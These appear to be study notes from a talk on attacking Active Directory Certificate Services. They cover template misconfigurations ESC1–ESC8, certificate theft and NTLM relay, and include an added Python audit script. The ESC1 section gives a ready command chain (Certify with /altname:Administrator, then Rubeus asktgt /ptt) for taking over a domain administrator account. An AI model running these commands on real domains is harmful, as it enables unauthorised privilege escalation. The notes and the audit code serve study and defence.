https://www.youtube.com/watch?v=ejmAIgxFRgM
Notes:
Find Certificate Authority
openssl s_client -connect <DC_IP>:636 -showcerts -debug
certipy find -u <username>@<domain>
certutil -dump
Living off the Land, provides a lot of info
Passive Cert Theft
If no hardware protection (TPM/HSM) user/machine private certs are stored with DPAPI. Can be stolen w/ Mimikatz or SharpDPAPI
Active Cert Theft
Users can enroll in any template they have Enroll permissions for.
By default User and Machine templates are available
We want a template that allows AD authentication
To get user’s TGT and NTLM (Rubeus)
Persistently compromises computer through RBCD/S4U2self - can login as computer
Enroll through DCOM(Certify), RPC, and AD CS web endpoints
If you are able to coerce authentication attempts to a device you control (e.g. Responder, mitm6, PetitPotam, etc.), you can use Impacket's ntlmrelayx to relay those authentication attempts to the CA's web enrollment endpoint and request a certificate
The User certificate (generally available by default) will allow login to the domain
Certify
https://github.com/GhostPack/Certify
C# toolkit released for talk.
Doesn’t touch LSASS
Doesn't need elevation for user contexts. Does for machine certs.
Still works if the account changes its password, and the cert has a long lifetime.
Certipy
https://github.com/ly4k/Certipy
Template Misconfigurations
Low priv users need enrollment rights
Security descriptor on the cert template object
Manager approval is disabled
No authorized signatures required
ESC1
Requirements
If a certificate template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set, then the requester can provide ANY domain account as the Subject Alternate Name (SAN) in the certificate request
The certificate can then be used to authenticate as the domain account provided as the SAN
General requirements (above)
PKINIT: Client Auth, Smartcard, Any Purpose
No EKU (i.e., auth allowed)
ENROLLEE_SUPPLIES_SUBJECT flag is set
certify.exe find /vulnerable /ca:dc.some.domain\\some-DC-CA
Finds vulnerable templates
certify.exe request /ca:dc.some.domain\\some-DC-CA /template:ESC1Template /altname:Administrator
Enrolls in vulnerable template. Copy cert into cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Convert cert to pfx
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password /ptt
Use Rubeus to get a TGT with the cert. The password here is the password you put on the pfx file when it was created. Once the TGT is granted you can access filesystems, etc. as the specified user.
ESC2
General Requirements
No EKU or Any Purpose EKU
Doesn’t allow immediate domain compromise but can create new certs with any EKU
Might be able to attack ADFS, SAML, IPSEC, etc.
ESC3
General requirements plus no enrollment agent restrictions
Certificate request agent EKU
Enrollment right to a template with other requirements
Allows you to request certs on behalf of another party. Complex attack path. See white paper.
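The template conditions listed under Template Misconfigurations and ESC1-ESC3 can be checked mechanically during an audit. The following is an added example (not from the talk or the Certify/Certipy projects) that applies those conditions to constructed template records shaped like the AD attributes involved (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, EKU OIDs, enroll principals); the template names and data are made up.

```python
# Added example (not from the talk or the Certify/Certipy projects): applies the
# ESC1-ESC3 template conditions listed above to constructed template records.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag bit
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: manager approval
ANY_PURPOSE = "2.5.29.37.0"
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",       # Client Authentication
             "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
             "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
             ANY_PURPOSE}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def general_requirements_met(t):
    """Low-priv enroll rights, manager approval off, no authorized signatures."""
    return (bool(LOW_PRIV & set(t["enroll"]))
            and not t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS
            and t["ra_signatures"] == 0)

def classify(t):
    """Return the ESC1/ESC2/ESC3 findings that apply to one template."""
    if not general_requirements_met(t):
        return []
    ekus, findings = set(t["ekus"]), []
    supplies_subject = t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    if (not ekus or ekus & AUTH_EKUS) and supplies_subject:
        findings.append("ESC1")  # requester picks the SAN, cert usable for auth
    if not ekus or ANY_PURPOSE in ekus:
        findings.append("ESC2")  # no EKU / Any Purpose EKU
    if CERT_REQUEST_AGENT in ekus:
        findings.append("ESC3")  # Certificate Request Agent EKU
    return findings

def audit(templates):
    return {t["name"]: classify(t) for t in templates}

def tmpl(name, ekus, name_flag=0, enrollment_flag=0, ra_signatures=0,
         enroll=("Domain Users",)):
    return dict(name=name, ekus=ekus, name_flag=name_flag, ra_signatures=ra_signatures,
                enrollment_flag=enrollment_flag, enroll=enroll)

TEMPLATES = [  # constructed sample data, not a real domain
    tmpl("User", ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]),
    tmpl("ESC1Template", ["1.3.6.1.5.5.7.3.2"], name_flag=0x1),
    tmpl("AnyPurpose", [ANY_PURPOSE], enroll=("Authenticated Users",)),
    tmpl("Agent", [CERT_REQUEST_AGENT], enroll=("Domain Computers",)),
    tmpl("Approved", ["1.3.6.1.5.5.7.3.2"], name_flag=0x1, enrollment_flag=0x2),
    tmpl("AdminOnly", ["1.3.6.1.5.5.7.3.2"], name_flag=0x1, enroll=("Domain Admins",)),
]
```

The "Approved" and "AdminOnly" records show why manager approval and restricting enroll rights to admins are the fixes the notes imply: the same name flag and EKU stop being a finding once the general requirements fail.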
ESC4
Vulnerable certificate template access control (edit templates)
Use certipy to modify the template and make it vulnerable to ESC1
ESC5
ESC6
ESC7
ESC8
Others:
Golden Certificates:
With Valid Cert can get User/Machine NTLM hash